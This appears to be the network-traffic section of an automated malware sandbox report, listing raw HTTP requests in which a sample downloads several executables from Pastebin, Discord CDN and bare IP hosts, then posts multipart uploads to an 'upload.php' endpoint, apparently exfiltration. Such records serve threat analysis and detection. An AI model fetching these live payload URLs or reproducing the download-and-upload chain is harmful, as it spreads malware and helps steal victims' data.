Network Analysis

GET /raw/E0rY26ni HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Sat, 17 Aug 2024 13:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge cf-chl-out: n/sGuqd0Cy6hGoUYBFX5utBcSXSkGUHgRCmaSe4sONqrXL8h971Y++tIWk2cDcaktyxjZ1xS3TmWniXcF+d09i80d4ClO2f1dPDVcW6M4KI=$0yOO2wJ+nro5mnsTD2YysA== Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTLFx2a%2FgEkCqm37SH1xbBxRMrsXjRmzAKcoaH5aSGa3lKv1usi4krtJXWeYgHhfDGnvlbDxRb4TJk9D9IrF7xpcRASRjfhiWmeP04c2JLpUi8EiLA8XbtI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b49eb62f8883173-LAX alt-svc: h3=":443"; ma=86400

GET /attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 17 Aug 2024 13:13:05 GMT Content-Type: application/x-msdos-program Content-Length: 7601622 Connection: keep-alive CF-Ray: 8b49eb6348cd8b5e-ICN CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 3259 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="setup.exe" ETag: "45a96ed03c6c80865fd53dc008908681" Expires: Sun, 17 Aug 2025 13:13:05 GMT Last-Modified: Sat, 17 Aug 2024 11:59:04 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1723895944594477 x-goog-hash: crc32c=46TzuA== x-goog-hash: md5=Ralu0DxsgIZf1T3ACJCGgQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7601622 x-guploader-uploadid: AHxI1nNDp89N3DuWlpEuw8Y_zGKiUQGznU7M-C3AUc0AYesDZh4eG1zK_DUpC07514OBm87rFAQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=GSL_.ZE0RlPSK7oWIBCYiQwJqfK.C5QV.MGIY_zaBng-1723900385-1.0.1.1-0Pyyjp_icNe2qP6_CpwUo.g0CJUxEzq3qkNNvz8whpsE9k7xG27m1xC5pCdDjBWDiU2bTZIXtLcAqZztJAOb3w; path=/; expires=Sat, 17-Aug-24 13:43:05 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JskCdSJUqPGheemol0QabKKaJaZIe5iqjMU34PCIR5F84v1EGsmh8GhYnPT0Khf5iVB67eqze0FhNrTWHhPZlkQLAV7ca9G6Fo95b1Q4gO16kQPFIU21OFuF8KVkRyo8EzxG4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=k7IrHkX6HNPcuKqYU4RIQb.dTWkMyET3fNgr3oSXlFs-1723900385892-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare

GET /Files/Channel1.exe HTTP/1.1 Host: 91.121.59.207 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 17 Aug 2024 13:13:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 16 Aug 2024 19:24:53 GMT ETag: "651af0-61fd1e9ec45c4" Accept-Ranges: bytes Content-Length: 6626032 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /d/385104 HTTP/1.1 Host: 194.58.114.223 Connection: Keep-Alive

HTTP/1.1 302 Found Server: nginx Date: Sat, 17 Aug 2024 13:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&

GET /Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe HTTP/1.1 Host: 91.121.59.207

HTTP/1.1 200 OK Date: Sat, 17 Aug 2024 13:13:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sat, 17 Aug 2024 11:18:28 GMT ETag: "1bb066-61fdf3c309735" Accept-Ranges: bytes Content-Length: 1814630 Content-Type: application/x-msdownload

GET /parts/setup1.exe HTTP/1.1 Host: 58yongzhe.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 17 Aug 2024 13:13:06 GMT Server: nginx/1.26.1 Content-Type: application/x-dosexec Content-Length: 265728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary39477433 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 413 Host: tvezx20pt.top

HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 17 Aug 2024 13:13:38 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"

POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary23686319 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 67008 Host: tvezx20pt.top

HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 17 Aug 2024 13:13:51 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"

POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary13498587 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 19003 Host: tvezx20pt.top

HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 17 Aug 2024 13:13:56 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"